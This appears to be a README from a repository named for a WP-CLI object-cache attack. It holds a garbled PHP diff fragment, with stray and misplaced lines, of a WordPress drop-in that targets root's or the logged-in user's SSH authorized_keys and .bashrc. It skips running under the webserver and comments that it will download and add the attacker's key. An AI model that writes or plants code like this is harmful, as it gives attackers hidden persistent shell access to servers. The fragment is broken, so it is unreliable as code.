yoramvandevelde/wp-cli_attack_object_cache/README.md

         	$keyfile = '/root/.ssh/authorized_keys';
 		$bashrc = '/root/.bashrc';
 	} else {
+                // get the username
 		@$user = posix_getlogin();
-        	@$keyfile = '/home/'.posix_getlogin().'/.ssh/authorized_keys';
+        	@$keyfile = '/home/'.$user.'/.ssh/authorized_keys';
 		$bashrc = '/home/'.$user.'/.bashrc';
         }
+	// If user is empty we are being served by the webserver.
+As this is a
-	// return to wp-includes if webserver is serving file, this is because we have no login if($user == '') {return;}
+        // environment with security restrictions we return and let WordPress do it's thing. if($user == '') {return;}

 	// download and add our key to the users authorized_keys